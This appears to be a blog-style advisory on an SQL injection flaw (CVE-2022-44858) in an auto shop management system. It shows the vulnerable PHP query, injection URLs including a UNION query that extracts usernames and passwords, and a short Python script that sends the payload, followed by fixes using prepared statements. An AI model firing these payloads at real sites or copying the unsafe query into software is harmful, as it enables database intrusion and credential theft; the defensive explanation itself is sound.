CVE-2022-44858 - SQL Injection Exploit in Automotive Shop Management System v1. (Exclusive Guide)

Discovered in 2022, CVE-2022-44858 is a notorious SQL injection vulnerability found in the Automotive Shop Management System (ASMS) v1.. This bug lets attackers tamper with your database, steal information, or even take control of your whole system. If your auto shop uses this software—or anything built on top—it’s critical to understand the vulnerability and how to fix it.

In this post, we’ll explain the vulnerability in plain English, show you the actual code involved, give you an exploit example, and link to credible sources for more info.

The issue sits in the view_product.php file, in this part of the URL

/asms/products/view_product.php?id=[USER INPUT]

The id parameter, just shown in the URL bar, is not properly checked or cleaned up before it’s used. That means you can put SQL code in there, and the database will swallow it.

Relevant Code (Vulnerable Sample)

<?php
// ./asms/products/view_product.php

include('../db_connect.php'); // database connection file

$id = $_GET['id'];
$query = "SELECT * FROM products WHERE id = $id";
$result = mysqli_query($conn, $query);

while($row = mysqli_fetch_assoc($result)){
    echo $row['name'];
    // ...other output...
}
?>

Notice: There’s no filtering or escaping of $id. User input goes directly into the query.

Say the normal link is

http://yourshop.com/asms/products/view_product.php?id=1

An attacker could try something sneaky

http://yourshop.com/asms/products/view_product.php?id=1%20OR%201=1

The query becomes

SELECT * FROM products WHERE id = 1 OR 1=1

Since 1=1 is always true, the database returns *all* products, not just the one with ID 1.

A simple SQL injection payload could look like this

http://yourshop.com/asms/products/view_product.php?id= OR 1=1 --

Or, to try and get user table data

http://yourshop.com/asms/products/view_product.php?id= UNION SELECT 1, username, password, 4 FROM users --

If the output is shown to the web page, the attacker can see usernames and password hashes.

Here’s a super simple Python script exploiting the bug

import requests

url = "http://yourshop.com/asms/products/view_product.php";
payload = "1 OR 1=1"
params = {'id': payload}

response = requests.get(url, params=params)
print(response.text)

Replace yourshop.com with the real address. This script fetches *all* product records thanks to the injection.

1. Always sanitize user input

Use parameterized queries instead of string concatenation.

<?php
$id = $_GET['id'];
$stmt = $conn->prepare("SELECT * FROM products WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();
$result = $stmt->get_result();

while($row = $result->fetch_assoc()){
    echo $row['name'];
}
?>

2. Limit database privileges

Give your database user the least permissions necessary. It shouldn’t be able to DROP tables.

3. Update Right Away

If you’re using ASMS v1., update your software. Or apply input sanitizing as above.

References and Further Reading

- NVD Entry for CVE-2022-44858
- Exploit Database (EDB-ID: 51308)
- OWASP SQLi Cheat Sheet
- Vendor’s GitHub

Wrap Up

CVE-2022-44858 in Automotive Shop Management System v1. is a serious flaw. SQL Injection is easy to prevent with prepared statements—don’t wait to update code if you’re affected. If you own or manage a shop using ASMS, check your URLs and publicly facing scripts for this flaw!

Help keep your business, and your customers, safe—patch fast and always code defensively. 🚗🔒

*This guide is exclusive—please reference back if you share or use this information elsewhere.*

Timeline

Published on: 11/25/2022 18:15:00 UTC
Last modified on: 11/28/2022 19:46:00 UTC